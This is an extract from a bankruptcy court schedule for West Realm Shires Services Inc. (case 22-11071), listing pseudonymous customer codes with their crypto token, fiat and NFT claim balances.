| 07426449 | | SOL[0] | | |
| 07426450 | | ALGO[14.76599144], ETH[0], LTC[0], SHIB[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07426451 | | ETH[.03755738], ETHW[.03755738], USD[0.36] | Yes | |
| 07426458 | | USD[0.00] | | |
| 07426460 | | FTX_EQUITY[0], USD[7.61] | | |
| 07426468 | | NFT [388691290829676972/Painture Gallery][1], USD[0.82], USDT[0] | | |
| 07426470 | | BTC[0], ETHW[.00170264] | | |
| 07426472 | | ETH[.00000001], ETHW[0], MATIC[0], SOL[0], USD[0.00] | | |
| 07426475 | | USD[0.00] | | |
| 07426476 | | USD[0.84] | | |
| 07426479 | | USD[3573.40] | | |
| 07426480 | | SOL[.0196], USD[0.00], USDT[0] | | |
| 07426484 | | USD[0.00], USDT[0] | Yes | |
| 07426485 | | SOL[6.71159707], USD[0.00] | | |
| 07426486 | | SOL[99], USD[0.00] | | |
| 07426490 | | SOL[0] | | |
| 07426491 | | DOGE[1495.992], TRX[9983.541], USD[0.00] | | |
| 07426496 | | MATIC[46.5127808], USD[0.20] | | |
| 07426498 | | AVAX[.00000001], BTC[.00014416], SOL[0], USD[0.56] | | |
| 07426501 | | ETH[.00000001], ETHW[.00000001] | | |
| 07426504 | | ETH[0], ETHW[0], LTC[0], SUSHI[.00000001] | | |
| 07426506 | | BTC[0], SOL[.00835] | | |
| 07426508 | | USD[0.00], USDT[3.89811679] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07426513 | | BF_POINT[200], NFT (296380186891287199/The Hill by FTX #263)[1], NFT (304067875026173989/Austin Ticket Stub #128)[1], NFT (344368530738448614/Bahrain Ticket Stub #57)[1], NFT (357261624311569583/FTX Crypto Cup 2022 Key #789)[1], NFT (421497987120891555/Serum Surfers X Crypto Bahamas #171)[1], NFT (448677063183244263/CORE 22 #24)[1], NFT (505746759662066547/Barcelona Ticket Stub #380)[1], SOL[.00000001], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07426515 | | ETH[0], NFT (454229720572238764/Imola Ticket Stub #708)[1], USD[0.00], USDT[0] | | |
| 07426516 | | AAVE[0], BTC[0.01385160], DAI[0], DOGE[2536.51609806], ETH[0], LTC[1.37224552], SHIB[0], SOL[1.45853705], USD[0.00] | | |
| 07426522 | | USD[6.09] | | |
| 07426523 | | SOL[.0025] | | |
| 07426525 | | DOGE[1], GRT[1], USD[0.00] | | |
| 07426527 | | BTC[0], ETH[0], USD[0.65] | | |
| 07426530 | | USD[0.01] | | |
| 07426538 | | BAT[0], BTC[0], USD[0.00] | | |
| 07426541 | | ETH[.02016363], ETHW[.01991721], SOL[51.48441916], SUSHI[4.53875592], USD[0.01] | Yes | |
| 07426546 | | USD[4.13] | | |
| 07426548 | | USD[0.31] | | |
| 07426549 | | USD[0.00] | Yes | |
| 07426554 | | BTC[.0023976], USD[50.88] | | |
| 07426555 | | BTC[.02530433], CUSDT[2], DOGE[1], ETH[.28477343], ETHW[.28477343], SHIB[2], TRX[1], USD[200.00] | | |
| 07426558 | | BRZ[1], DOGE[2], ETH[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07426561 | | EUR[3973.02], SOL[5.07407], USD[515683.88] | | EUR[3970.18] |
| 07426562 | | DOGE[164.68209242], ETH[0.00000267], ETHW[0.00000267], USD[0.00], USDT[0] | Yes | |
| 07426564 | | BTC[0.00008424], ETHW[.0000664], USD[1.03] | | |
| 07426569 | | USD[0.43], USDT[0.00000001] | | |
| 07426572 | | BF_POINT[100], BRZ[7.48138836], CUSDT[93.09711751], DOGE[1.01499699], ETH[0], ETHW[0], LTC[0], MATIC[.00088762], NFT (298807589919446218/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #25)[1], NFT (360420829819520316/Entrance Voucher #3575)[1], NFT (452525312387524146/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #36)[1], SOL[.00000001], TRX[1.00499934], USD[0.00], USDT[0] | Yes | |
| 07426576 | | USD[12.70] | | |
| 07426581 | | BRZ[1], BTC[0], TRX[0.00003200], USDT[1] | | |
| 07426585 | | BRZ[1], CUSDT[5], TRX[1], USD[32.90], USDT[0] | Yes | |
| 07426586 | | USD[0.00], USDT[0.00001698] | | |
| 07426600 | | USD[0.00], USDT[.0067792] | | |
| 07426606 | | SOL[0], USD[0.00] | | |
| 07426607 | | DAI[.09957297], DOGE[.624], ETH[.0999], ETHW[.0999], NFT (304853596771333043/Gloom Punk #1117)[1], NFT (336515685830030925/Metabro #1579)[1], NFT (343903629067034027/Gloom Punk #2264)[1], NFT (436800495071882451/Gloom Punk #8916)[1], NFT (442597892159065782/Metabees #907)[1], SOL[.7626], USD[46.87], USDT[2.82530404] | | |
| 07426610 | | NFT (367971165879405287/2974 Floyd Norman - OKC 6-0254)[1], NFT (459676712158679551/Birthday Cake #1230)[1], NFT (519185574233731206/The 2974 Collection #1230)[1] | | |
| 07426611 | | SOL[19.99] | | |
| 07426614 | | ETHW[.2078024], MATIC[4135.972], USD[10636.28] | | |
| 07426615 | | BTC[0], ETH[0], USD[0.58] | | |
| 07426625 | | BTC[0], ETH[0], SOL[0], TRX[0.00003000], USD[0.00], USDT[0.00047845] | | |
| 07426627 | | TRX[1], USD[0.00] | | |
| 07426630 | | USD[0.04] | | |
| 07426631 | | BTC[0.17161450], SOL[.00991813], USD[0.00] | | |
| 07426633 | | ETH[0], ETH[0.00000001], SOL[0], USD[0.55], USDT[0.00000001] | | |
| 07426637 | | USD[19.00] | | |
| 07426638 | Contingent, Disputed | SOL[.0152], TRX[.000583], USD[0.00] | | |
| 07426640 | | BTC[.0548796], TRX[.000003], USDT[145.571083] | | |
| 07426650 | | LINK[.0712], SOL[.00805], USD[445.40] | | |
| 07426657 | | SHIB[7864.36197184], USD[0.00] | Yes | |
| 07426659 | | DOGE[617.0438012], USD[0.01] | | |
| 07426661 | | BAT[1.0165555], BRZ[1], CUSDT[2], DOGE[34348.68462252], GRT[1.00498794], SUSHI[1.1029801], TRX[1], USD[0.00], USDT[1.10333266] | Yes | |
| 07426662 | | BTC[0], DOGE[0], LTC[.9209663], SOL[0], USD[0.00], USDT[0.00000017] | | |
| 07426665 | | USD[0.00] | | |
| 07426671 | | USD[0.42] | | |
| 07426677 | | USD[52.57] | | |
| 07426680 | | NFT (321529504604323859/Birthday Cake #1968)[1], NFT (381426380870803402/The 2974 Collection #1968)[1], NFT (561136601095030961/The 2974 Collection #1602)[1], NFT (569583975529491326/Birthday Cake #1602)[1], USD[12.00] | | |
| 07426698 | | USD[0.00], USDT[0.35508576] | | |
| 07426703 | | TRX[.00000001], USD[0.07] | | |
| 07426710 | | ETHW[1.2430157], USD[1558.28] | | |
| 07426715 | | SOL[.4962], USDT[3.936121] | | |
| 07426718 | | USD[50.06], USDT[0] | | |
| 07426720 | | USDT[3.415] | | |
| 07426722 | | BTC[.074], ETH[1.118], ETHW[1.118], USD[137591.88], WEST_REALM_EQUITY[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07426723 | | BTC[.00089362] | | |
| 07426730 | | BCH[0], BTC[0.00636730], DOGE[0.81789048], ETH[0.00075454], LINK[0], MKR[0], SOL[0.00075176], UNI[0], USD[254.31], USDT[0.00760884] | | |
| 07426737 | | BTC[.00000341], USDT[.171566] | | |
| 07426742 | | DOGE[0.69946870], ETHW[.00015], MATIC[0], SOL[0], TRX[0.40088400], USD[4.37], USDT[0] | | |
| 07426744 | | DOGE[0.63745249], TRX[0], USD[1.18] | | |
| 07426748 | | NFT (320388645557663073/01:Predawn - Ukraine #369)[1], SOL[.00196491], USD[14.78], USDT[.529539] | | |
| 07426756 | | BTC[0.00042240], ETH[.1418651], ETHW[.1418651], LINK[2.296105], LTC[.339677], SOL[.63375276], USD[102.86] | | |
| 07426761 | | AAVE[.008784], BTC[0.00003876], NEAR[.0032], NFT (299619402519279206/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #4)[1], NFT (31567231952084697/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #2)[1], NFT (332462824958942830/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #8)[1], NFT (352171160482436695/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #3)[1], NFT (368475305298930603/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #6)[1], NFT (372138293997638400/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #4)[1], NFT (372345180385785904/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #2)[1], NFT (379003792170116324/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #2)[1], NFT (417605683319278247/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #6)[1], NFT (422125526818384852/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #2)[1], NFT (424912440254024192/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #8)[1], NFT (435811112550750148/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #7)[1], NFT (447079146836789369/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #3)[1], NFT (478506108568414224/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #4)[1], NFT (480335988665079131/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #4)[1], NFT (487466179409907431/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #4)[1], NFT (504165118926638803/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #4)[1], NFT (572030531883792297/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #7)[1], NFT (572284859969515445/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #9)[1], SUSHI[.233], USD[18.84], USDT[0.00967496] | | |
| 07426766 | | BTC[0], ETH[0], SOL[0.00134200], SUSHI[.2391], TRX[.000001], USD[0.01], USDT[0.00000001] | | |
| 07426767 | | MATIC[0], USDT[0] | | |
| 07426774 | | BTC[.00324613], CUSDT[5], DOGE[2.45138283], ETH[.09078366], ETHW[.08973279], LINK[1.55739696], LTC[.07942093], TRX[3], USD[0.06] | Yes | |
| 07426788 | | ETHW[.05958248], USD[0.00] | | |
| 07426788 | | BTC[0], USD[0.00], USDT[0.00037341] | | |
| 07426792 | | DOGE[2], ETH[.0952382], ETHW[.0952382], NFT (297229010653019545/Raydium Alpha Tester Invitation)[1], NFT (314103703439084972/3D Squid Game Tattoo)[1], NFT (317271701391155171/GSW '47 Championship Ticket #10 (Redeemed))[1], NFT (319367309369766779/Raydium Alpha Tester Invitation)[1], NFT (322313718118199608/GSW Round 1 Commemorative Ticket #21)[1], NFT (331320152243112807/Reflection '13 #09 (Redeemed))[1], NFT (344990279048067474/GSW Western Conference Finals Commemorative Banner #1602)[1], NFT (372106335091550005/Raydium Alpha Tester Invitation)[1], NFT (373292734765359224/StarAtlas Anniversary)[1], NFT (403880625661626624/Golden Hill #493 (Redeemed))[1], NFT (434151661364482947/Raydium Alpha Tester Invitation)[1], NFT (463304440198397582/GSW Western Conference Finals Commemorative Banner #1601)[1], NFT (469274346764941664/Raydium Alpha Tester Invitation)[1], NFT (501759178054010152/StarAtlas Anniversary)[1], NFT (503652784718226107/Raydium Alpha Tester Invitation)[1], NFT (507583501581806550/StarAtlas Anniversary)[1], NFT (518717858308084578/StarAtlas Anniversary)[1], NFT (526721038156156574/StarAtlas Anniversary)[1], NFT (538948361154285427/GSW Western Conference Semifinals Commemorative Ticket #821)[1], NFT (543508048509297382/Raydium Alpha Tester Invitation)[1], NFT (544112022467837829/StarAtlas Anniversary)[1], NFT (546486834844966425/Spectra #935 (Redeemed))[1], NFT (550775757188150674/StarAtlas Anniversary)[1], NFT (553784727150548735/Raydium Alpha Tester Invitation)[1], NFT (566760155517678142/GSW Championship Commemorative Ring)[1], NFT (572592571771679487/Raydium Alpha Tester Invitation)[1], USD[0.00], USDT[0] | | |
| 07426804 | | USD[0.96] | | |
| 07426806 | | LTC[.00664446], USD[0.33] | | |
| 07426807 | | DOGE[.5042], NFT (301711783122478317/Coachella x FTX Weekend 1 #1221)[1], SUSHI[.11225], USD[0.00] | | |
| 07426810 | | CUSDT[1], DOGE[154.60609638], SOL[.9181587], TRX[1], USD[50.95] | | |
| 07426813 | | NFT (381946455552842440/NYC photos)[1], USD[0.01] | | |
| 07426818 | | USD[0.00] | | |
| 07426819 | | LINK[.0609], MATIC[3.424], NFT (323086043080956595/Night Light #580)[1], NFT (347333805866583783/Spectra #276)[1], NFT (360080681245852534/Microphone #220)[1], NFT (387312407532372038/Reflection '15 #17)[1], SUSHI[.1608], TRX[.084], USD[1.09] | | |
| 07426820 | | BAT[1], CUSDT[5], ETH[0], TRX[6], USD[0.00], USDT[1] | | |
| 07426823 | | DOGE[.063], ETH[.0007398], ETHW[.0007398], LINK[.07479974], NFT (362527246236087956/Primary)[1], NFT (378519899103715255/SolArcher #108)[1], NFT (383226909742710959/SolArcher #115)[1], NFT (415498141280054078/Primary)[1], NFT (424460511971526461/Primary)[1], NFT (514246890814666535/Spicy Tamale 251)[1], NFT (516952567698097960/Primary)[1], NFT (527892290632682179/Dromenon)[1], NFT (571452173945452757/Primary)[1], SOL[.02475002], USD[40.26] | | |
| 07426831 | | BTC[.000006] | | |
| 07426832 | | CUSDT[4], SHIB[2], TRX[1], USD[0.00] | | |
| 07426835 | | BCH[0], BTC[0], CUSDT[4], DOGE[0], ETH[0], GRT[0], LTC[0], SUSHI[.00009245], TRX[2], UNI[0], USD[0.00] | | |
| 07426842 | | BAT[2], DOGE[3], ETH[0], GRT[3], TRX[1], USD[0.00], USDT[0] | | |
| 07426844 | | USD[0.01] | | |
| 07426846 | | BTC[0], ETH[.00000001], TRX[.000005], USD[0.00], USDT[0.00006311] | | |
| 07426847 | | CUSDT[5], DOGE[1.51806283], TRX[1.00002149], USD[0.79] | Yes | |
| 07426848 | | DOGE[0], SOL[0], USD[0.91] | | |
| 07426850 | | SOL[0] | | |
| 07426851 | | USD[0.00] | | |
| 07426853 | | TRX[.01143], USD[11.28], USDT[8.63071800] | | |
| 07426855 | | BTC[.00057428] | | |
| 07426856 | | ETH[.11867768], ETHW[.11867768], SOL[6.69231478], USD[1.26], USDT[0.00179501] | | |
| 07426857 | | AVAX[0], BRZ[1], BTC[0.00000888], DOGE[1], ETH[-0.00037832], ETHW[-0.01488115], GRT[1], MATIC[.57], SOL[.00036961], SUSHI[0], TRX[1], USD[-23.00], WBTC[0.00143791], YFI[0.00083666] | | |
| 07426869 | | BRZ[2], SHIB[1], USD[0.01] | Yes | |
| 07426871 | | USD[0.12] | | |
| 07426875 | | CUSDT[1], USD[0.00] | | |
| 07426877 | | BAT[205.70091191], CUSDT[1], DOGE[2], SHIB[4728132.38770685], TRX[4611.19934897], USD[0.00] | | |
| 07426883 | | BRZ[2], BTC[.00340881], CUSDT[7], USD[0.00] | Yes | |
| 07426886 | | CUSDT[5], USD[0.00] | | |
| 07426887 | | USD[0.04] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07426888 | | ETH[0], SOL[0] | | |
| 07426889 | | NFT (425273772153852219/PixelPuffins #5688)[1], NFT (427272741758176016/Nobu Sensei #324)[1] | | |
| 07426890 | | BTC[.00076094], USD[165.76], USDT[0] | | |
| 07426892 | | TRX[.000001] | | |
| 07426896 | | CUSDT[471.68698851], USD[0.00] | | |
| 07426905 | | BTC[0], ETH[.00096], ETHW[.00096], SOL[.00009], SUSHI[.4601], USD[0.00], USDT[0] | | |
| 07426906 | | TRX[.000002], USD[0.29], USDT[90.58348487] | | |
| 07426909 | | BTC[0.00015801], ETHW[.57090335], SOL[190.54925], USD[200.20], USDT[0] | | |
| 07426910 | | SOL[.05531808], USD[0.00], USDT[0.00015654] | | |
| 07426916 | | BRZ[1], CUSDT[6.00064268], DOGE[2], ETH[.000001], ETHW[.000001], LINK[0], SHIB[5], SUSHI[0], TRX[0], USD[52.08] | | |
| 07426917 | | DOGE[0], SOL[0], TRX[0], USD[0.01], USDT[0.00000001] | | |
| 07426918 | | BTC[0.00019767], DOGE[0.13700000], ETH[0.00035500], USD[1627.34] | | |
| 07426923 | | LINK[1], USD[0.00], USDT[1] | | |
| 07426927 | | USD[0.12] | | |
| 07426930 | | BRZ[1], DOGE[4], GRT[3.01926701], NFT (291533955877080093/Morning Sun #451)[1], NFT (575718737390386516/APEFUEL by Almond Breeze #169)[1], SHIB[2], SOL[.0782685], TRX[1], USD[0.00], USDT[1.05032084] | Yes | |
| 07426934 | | DOGE[1], GRT[28.89645256], USD[0.00] | | |
| 07426935 | | BCH[0], BTC[0], DOGE[1.55967199], LTC[0], SOL[0], TRX[.000015], USD[368.95], USDT[0] | | |
| 07426937 | | USD[0.00] | | |
| 07426942 | | BRZ[1], CUSDT[2], SOL[0.97608576], USD[0.00] | Yes | |
| 07426945 | | BTC[.00008744], USD[0.00], USDT[0] | | |
| 07426946 | | EUR[0.00], NFT (419987758238621946/Colossal Cacti #149)[1], USD[0.00], USDT[0.00000001] | | |
| 07426951 | | DOGE[2], TRX[1], USD[0.00], USDT[0.00000106] | | |
| 07426956 | | AVAX[0], BTC[.000067], ETH[.00052694], ETHW[.000969], USD[0.00] | | |
| 07426969 | | AUD[0.00], CUSDT[2], USD[0.00] | | |
| 07426978 | | AVAX[453.68442628], BAT[2], BRZ[3], DOGE[1], ETH[.00055318], EUR[0.00], GRT[2], SHIB[734.79732586], SOL[.00096988], TRX[2], UNI[1.00363206], USD[0.00] | Yes | |
| 07426980 | | ETH[0], USD[0.00], USDT[0.00000010] | | |
| 07426982 | | ETH[0], SOL[0.00000001], USD[1.07], USDT[0.00000462] | | |
| 07426984 | | BTC[.00003613], ETHW[.999], USD[0.00], USDT[0.00000001] | | |
| 07426985 | | BTC[.00730665], CUSDT[1], DOGE[1], LINK[3.34599704], USD[0.00] | | |
| 07426997 | | DAI[.0684], SOL[.012], TRX[.668], USD[2.30] | | |
| 07426998 | | USD[0.00], USDT[0] | | |
| 07426999 | | CUSDT[1], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07427005 | | BRZ[3], CUSDT[3], DOGE[4410.09678723], ETH[.06129926], ETHW[.06053746], LTC[.25733704], TRX[6], USD[94.34] | Yes | |
| 07427007 | | NFT (302417358704434516/Marcus Allen's Playbook: Kansas City Chiefs vs. Detriot Lions - November 29, 1996 #18)[1], NFT (451643187820462632/Warriors 75th Anniversary Icon Edition Diamond #539)[1], NFT (506320511280337371/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #27)[1], USD[2.81], USDT[0] | | |
| 07427008 | | BRZ[1], CUSDT[4], USD[0.00] | Yes | |
| 07427012 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07427014 | | DOGE[0], ETH[.0003806], ETHW[.0003806], MATIC[0], SOL[0.02928954], USD[0.23] | | |
| 07427015 | | BTC[0], USD[15.64], USDT[0.00015605] | | |
| 07427018 | | ETH[.00056408], ETHW[0.00056407], SOL[.42957], USD[3.17] | | |
| 07427023 | | BRZ[1], CUSDT[4], DOGE[11.71205028], TRX[1], USD[0.05] | | |
| 07427033 | | BAT[1.10903208], BCH[.00363294], BRZ[11.07208495], CAD[0.41], CUSDT[32], DOGE[6.33119478], ETH[.00004308], ETHW[.00004308], GRT[0.34453248], LTC[0.00520217], SOL[.0003701], SUSHI[1.05379566], TRX[11.09557971], UNI[.02336377], USD[0.87], USDT[3.32503223] | Yes | |
| 07427037 | | BAT[82.22734809], BRZ[2], BTC[.01473878], CUSDT[13], DOGE[316.43443716], ETH[.09519628], ETHW[.09519628], GRT[519.42319308], LINK[12.96998501], TRX[16578.14467667], USD[0.00] | | |
| 07427041 | | BAT[1], BTC[.01726067], USD[0.00] | | |
| 07427044 | | BAT[.00001943], BCH[0], CUSDT[1], DOGE[0], TRX[2], USD[0.00] | | |
| 07427047 | | BTC[.0009], ETH[.011], ETHW[.011], LINK[.01], USD[20.93] | | |
| 07427048 | | AVAX[0], CUSDT[4], SHIB[2], TRX[2], USD[0.00] | Yes | |
| 07427062 | | BRZ[4], CUSDT[16], TRX[4], USD[0.01] | | |
| 07427063 | | CUSDT[1], DOGE[0], ETH[.00000001], USD[0.00] | Yes | |
| 07427066 | | USD[1.40] | | |
| 07427068 | | BRZ[3], DOGE[589.01305267], SHIB[3], TRX[2], USD[0.12], USDT[1.02543197] | Yes | |
| 07427073 | | BTC[0], ETHW[.444555], USD[6175.50], USDT[0] | | |
| 07427077 | | AUD[0.00], EUR[0.00], GBP[0.00], USD[0.01] | | |
| 07427087 | | DOGE[.02616544], ETHW[7.55901372], NFT (374237298951165462/Coachella x FTX Weekend 2 #5636)[1], NFT (428216791443759654/Entrance Voucher #25464)[1], SOL[0], USD[200.07] | Yes | |
| 07427100 | | USD[0.00] | | |
| 07427103 | | USD[0.01] | | |
| 07427118 | | SHIB[184180.74223127], USD[0.00] | | |
| 07427142 | | DOGE[1], LINK[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07427148 | | USD[0.01], USDT[0] | | |
| 07427154 | | USD[0.00], USDT[0.00000012] | | |
| 07427155 | | BTC[0], ETH[0.25191713], ETHW[0], SOL[0], USD[0.00], USDT[0.00000953] | | |
| 07427157 | | CUSDT[389.06449356], DOGE[1.18671857], TRX[1], USD[0.89] | | |
| 07427158 | | BTC[.00002346], ETH[.00025475], ETHW[.00025475], GRT[.421], LINK[.0053], SOL[.00543076], SUSHI[.08832683], USD[0.02], USDT[0] | | |
| 07427162 | | CUSDT[6], DOGE[203.97553418], USD[0.00] | Yes | |
| 07427165 | | BRZ[2], CUSDT[4], TRX[2], USD[0.01] | | |
| 07427172 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07427173 | | USD[862.35], USDT[0] | | |
| 07427177 | | DOGE[2], ETH[0], GRT[1], SOL[0], USD[0.00] | | |
| 07427182 | | CUSDT[2], DOGE[2], ETHW[.1927471], TRX[1], USD[241.14] | Yes | |
| 07427185 | | DAI[0], ETHW[1.4385799], USD[0.00] | | |
| 07427197 | | BTC[.00000548], ETH[0], PAXG[.00000001], SOL[0], USD[0.00], USDT[0.00000018] | | |
| 07427200 | | DOGE[374.035], TRX[.000003], USD[0.87], USDT[3.20276698] | | |
| 07427206 | | USD[0.01], USDT[0] | | |
| 07427210 | | BTC[0], ETH[0.00000051], ETHW[0.00000051], NFT (322627166648768068/Humpty Dumpty #28)[1], NFT (328255348601153606/Miami Ticket Stub #194)[1], NFT (423394265434022926/Reflection '11 #26)[1], NFT (535768820100575128/Series 1: Wizards #432)[1], NFT (565147776219181661/Colossal Cacti #778)[1], SHIB[1], TRX[337.412274], USD[19.99], USDT[2], XRP[.999999] | Yes | |
| 07427216 | | ETHW[.03], USD[0.06] | | |
| 07427226 | | DOGE[2], USD[0.00] | | |
| 07427241 | | DOGE[.705], SOL[.076], SUSHI[.2085], USD[1047.56], USDT[0] | | |
| 07427247 | | AAVE[0], BAT[0], BF_POINT[300], BRZ[1], BTC[0], CUSDT[14], DOGE[1], GRT[0], LINK[0.00042007], LTC[0.00008373], MATIC[0.00277606], MKR[0.00000308], NFT (565465788359814648/Australia Ticket Stub #2133)[1], SHIB[25], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.32], USDT[0], YFI[0] | Yes | |
| 07427252 | | CUSDT[1], DOGE[2.7364417], LTC[.00443987], USD[0.00], USDT[0] | | |
| 07427253 | | BF_POINT[300], BRZ[2], TRX[6], USD[1.63] | Yes | |
| 07427255 | | CUSDT[2], USD[0.00] | | |
| 07427256 | | CUSDT[12], DOGE[1771.99373287], ETH[1.32885067], ETHW[1.32829264], USD[0.00], USDT[0] | Yes | |
| 07427261 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07427263 | | DAI[1902], USD[347.10] | | |
| 07427265 | | DOGE[.872], SOL[.048], USD[1.54] | | |
| 07427266 | | CUSDT[1], DOGE[24010.37275483], TRX[1], USD[0.00] | Yes | |
| 07427273 | | DOGE[1418.82738435], ETHW[.04165606], SHIB[2], USD[146.42] | | |
| 07427295 | | SOL[0] | | |
| 07427296 | | DOGE[365.79157601], SHIB[818957.09474055], USD[0.00] | Yes | |
| 07427298 | | DOGE[259.34331739], USD[0.31], USDT[0] | | |
| 07427307 | | USD[0.00] | | |
| 07427309 | | BTC[0], DAI[.00000001], ETH[0.00000001], ETHW[0], NFT (363098847561002942/Space Dream #2)[1], SOL[.00000001], USD[0.00] | | |
| 07427313 | | USD[0.00] | | |
| 07427320 | | BRZ[57.3509261], CUSDT[21], TRX[751.41567635], USD[0.01] | | |
| 07427321 | | USD[20.00] | | |
| 07427327 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07427330 | | SHIB[1], USD[0.00], USDT[1.10922507] | Yes | |
| 07427331 | | BTC[0.00016292], USD[0.53] | | |
| 07427335 | Contingent, Disputed | CUSDT[3], USD[0.00], USDT[0] | | |
| 07427338 | | TRX[0], USD[0.00] | | |
| 07427343 | | BAT[0], DAI[0], SOL[0], UNI[0], USD[0.00], USDT[0] | | |
| 07427344 | Contingent, Disputed | TRX[.000003] | | |
| 07427345 | | BAT[1], BRZ[1], CUSDT[1], ETH[0], USD[0.00] | | |
| 07427348 | | ETH[.005], ETHW[.005] | | |
| 07427355 | | DOGE[0], SHIB[5], USD[66.38] | Yes | |
| 07427356 | | BRZ[1], USD[9], USD[0.01] | | |
| 07427358 | | BTC[.00498397], CUSDT[1], DOGE[3731.05228187], ETH[.06179861], ETHW[.06179861], USD[0.00] | | |
| 07427370 | | CUSDT[1], DOGE[2], USD[21.84] | | |
| 07427375 | | CUSDT[3], USD[0.00] | | |
| 07427380 | | DOGE[51.00443024], USD[2.00] | | |
| 07427383 | | BAT[2.074656], BRZ[11.81318717], BTC[0], CUSDT[13], DOGE[3], ETH[0], ETHW[0], GRT[5.10443364], LINK[0], SHIB[6], SOL[0.00029051], TRX[9], USD[57.95], USDT[2.16054692] | Yes | |
| 07427384 | | USD[0.07] | | |
| 07427392 | | DOGE[84.40479823], USD[0.00] | | |
| 07427396 | | BTC[0], NFT (512682529512436826/Entrance Voucher #29429)[1], SOL[0], USD[0.00] | | |
| 07427399 | | BAT[1], BRZ[4], CUSDT[13], DOGE[1], GRT[1], SOL[0], TRX[9], USD[0.00] | | |

West Realm Shires Services Inc.

Amended Schedule F Nonpriority Unsecured Customer Claims

22-11071 (JTD)

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07427406 | | BTC[.01570691], ETH[.20403455], ETHW[.20403455], USD[1618.99] | | |
| 07427408 | | TRX[.582247] | | |
| 07427411 | | USD[1.62] | | |
| 07427417 | | LTC[.00451], USDT[7.3866169] | | |
| 07427426 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07427429 | | SOL[0], USD[0.32], USDT[0.00000001] | | |
| 07427431 | | USD[0.00], USDT[.29082975] | | |
| 07427433 | | BCH[1.49549399], BRZ[1], BTC[.05104498], CUSDT[2], DOGE[65512.62654514], ETH[.52465588], ETHW[.52465588], GRT[195.43077251], SHIB[4], SOL[.99693252], TRX[2390.62287251], USD[0.00] | | |
| 07427437 | | CUSDT[3], ETH[.01637545], ETHW[.01617025], SHIB[2291841.90577401], TRX[204.2844958], USD[11.68] | Yes | |
| 07427438 | | DOGE[0], ETH[0], GRT[1.00090455], SOL[.00000068], USD[0.00], YFI[0] | | |
| 07427439 | | SOL[4.98], USD[0.07] | | |
| 07427440 | | BF_POINT[400], USD[1.00], USDT[0] | | |
| 07427444 | | BRZ[1], CUSDT[2], TRX[0], USD[0.00] | | |
| 07427449 | | USD[0.00] | | |
| 07427450 | | CUSDT[541.40395234], DOGE[1801.93722090], ETH[.00524632], ETHW[.00517792], SHIB[871245.90976107], TRX[80.82785409], USD[0.01] | Yes | |
| 07427454 | | BTC[0], LTC[0], USD[0.00], USDT[0.00000001] | | |
| 07427472 | | BF_POINT[9300], USD[1.49] | | |
| 07427474 | | BAT[1], BRZ[1], USD[0.01], USDT[1] | | |
| 07427487 | | BAT[1.0165555], BRZ[2], CUSDT[7], DOGE[8.33855262], SOL[0], TRX[1], USD[677.04], USDT[0.00595880] | Yes | |
| 07427488 | | BRZ[1], USD[0.00] | | |
| 07427495 | | BAT[77.21722828], CUSDT[7], DOGE[0], ETH[0.06577611], ETHW[0.06495860], TRX[2], USD[0.00], USDT[1.09769673] | Yes | |
| 07427499 | Contingent, Disputed | BF_POINT[100], BTC[.00664149], ETH[.05791159], SHIB[414212.49823979], SOL[1.52851733], USD[0.23] | Yes | |
| 07427505 | | BAT[0], DOGE[0], USD[0.00] | | |
| 07427508 | | BTC[0.00450066], DOGE[0], GRT[1], TRX[1] | | |
